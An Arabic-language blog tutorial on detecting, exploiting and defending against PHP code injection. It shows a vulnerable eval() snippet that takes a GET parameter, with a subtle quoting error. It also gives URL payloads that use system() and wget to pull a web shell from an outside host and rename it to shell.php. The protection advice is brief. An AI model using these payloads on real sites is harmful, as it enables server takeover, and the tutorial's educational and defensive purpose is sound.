شرح explain اكتشاف detection استغلال exploitation حماية secure ثغرة exploit خطا bug بى اتش بى php كود code حقن injection
السلام عليكم
ازاى الحال ؟
شرحنا النهاردة ليه 3 اجزاء وهو اكتشاف و استغلال و حماية الثغرات من نوع PHP code injection, Remote code injection
هنشوف مع بعض ازاى نكتشف ونستغل ونحمى الثغرات اللى من نوع PCI, RCI بسهولة ان شاء الله
RCI, PCI هيا اختصار لـ Remote code injection, PHP code injection
النوع ده من الثغرات بنقدر من خلاله نحقن اكواد بلغة PHP فى الموقع المصاب ونتحكم فى الموقع او السيرفر نفسه كمان
النوع ده خطير جدا فى استغلاله لان ممكن نستخدم طرق خطيرة فعلا فى استغلالها
واضعف الحالات اننا نستخدم دوال لغة PHP زى مثلا دوال تنفيذ الاوامر اللى هيا زى مثلا
system, passthru, shell_exec, exec, popen
احنا بدرسنا هنشوف مع بعض ازاى نعمل ده
نيجى اول حاجة لـ شوية تعريفات بسيطة
ثغرة "Bug" ؟
هيا خطأ برمجى بيقع فيه المبرمج لما يبرمج السكربت او البرنامج بتاعه والثغرات ليها انواع كتيرة وكل ثغرة وليها استغلال
خاص بيها
شل "Shell" ؟
هو ملف مبرمج بلغة PHP , وفيه بعض ملفات الشل بتكون مبرمجة بلغات برمجية تانية زى Perl, Python, Bash
وظيفة الشل ايه ؟
هو عبارة عن اداة مساعدة ليك فى تنفيذ اوامر على السيرفر , نقدر نقول عليه File Manager للتحكم فى الموقع اللى انت عليه وفيه Command Line عشان تنفذ اوامرك منه
سيرفر "Server" ؟
هو عبارة عن خادم , جهاز كمبيوتر بس بامكانيات عالية جدا ومخصصة للعمل كـ سيرفر
حقن كود بى اتش بى "Php Code Injection" ؟
النوع ده من الثغرات يعتبر من اخطر الانواع لان من خلاله بنقدر ننفذ اكواد بى اتش بى على السيرفر
يعنى سحب ملف او نطبق اوامر على السيرفر من خلال دوال تنفيذ الاوامر زى
system, passthru, etc..
تمام لحد كده يا رجالة نرجع بقى لدرسنا
اول جزء هيكون اكتشاف الثغرات من نوع PHP code injection, Remote code injection
هنشوف مع بعض ازاى نكتشف الثغرات اللى من النوع ده
اول حاجة محتاجين لـ برنامج محرر اكواد PHP او محرر نصوص زى
Notepad++, RapidPHP
واذا كان نظامك لينوكس (Linux) ممكن نستخدم برنامج
Geany
طيب بعد ما نفتح البرنامج هندور على ايه
هندور على Vulnerabilities functions او ما يسمى بـ الدوال المصابة
الدالة المصابة للنوع ده من الثغرات هيا
eval();
عشان نتعرف اكتر على الدالة
طيب نشوف مثال بسيط عندنا ملف بـ اسم test.php وفيه الكود التالى
<?php
$ex = $_GET['code'];
eval('$ex');
?>
زى ماهو واضح قدامنا مفيش اى حماية او فلترة لـ GET
تانى جزء وهو استغلال الثغرات من نوع PHP code injection, Remote code injection
هنشوف ازاى نستغل الثغرات اللى من النوع ده يا رجالة
ممكن ببساطة او اقل استغلال للثغرة دى هو اننا نحقن ملف شل على السيرفر
طب ازاى نعمل ده
نشوف مع بعض الاستغلال هيكون من خلال دالة تنفيذ الاوامر
system();
نشوف مثال لـ الاستغلال
domain.tld/test.php?code=system('wget http://site.com/shell.txt; mv shell.txt shell.php');
هنا احنا نفذنا امر السحب (wget) عشان نسحب ملف شل بامتداد txt وبعدين عملنا امر التغيير للملف وخلناه يبقى (shell.php)
وممكن نختصر الامر اللى فوق بالامر التالى والنتيجة برضو هتبقى نفس اللى فوق
domain.tld/test.php?code=system('wget http://site.com/shell.txt -O shell.php');
لو نفذنا الامر التالى برضو هيسحب لنا ملف الشل بامتداد txt ويحوله لـ php
تالت جزء وهو حماية الثغرات من نوع PHP code injection, Remote code injection
هنشوف ازاى نحمى الثغرات اللى من النوع ده يا رجالة
طرق الحماية كتيرة جدا خلينا نشرح بعض الطرق منها
1- منع الدوال اللى بتشكل خطورة على السيرفر زى دوال تنفيذ الاوامر , دوال قراءة الملفات , دوال استدعاء الملفات , غيرها
2- تعطيل استخدام " ; " واللى تسمى بـ Semi colon
3- تعطيل استخدام "( " , " ) " واللى تسمى بـ Parentheses
وطرق تانية هبقى احطها فى موضوع ان شاء الله منفصل لـ الدالة على المدونة
طيب نيجى بقى لتطبيق فديو لثغرة من النوع ده على موقع مصاب بيها
نيجى على التحميل يا رجالة على الرابط التالى
اى استفسار يا ريت يكون على الاسك بتاعى
اى اضافة اهلا بيها يا رجالة
الصياد /.
اخى الكريم , قبل اضافة التعليق تذكر قول الله تعالى "ما يلفظ من قول الا لديه رقيب عتيد"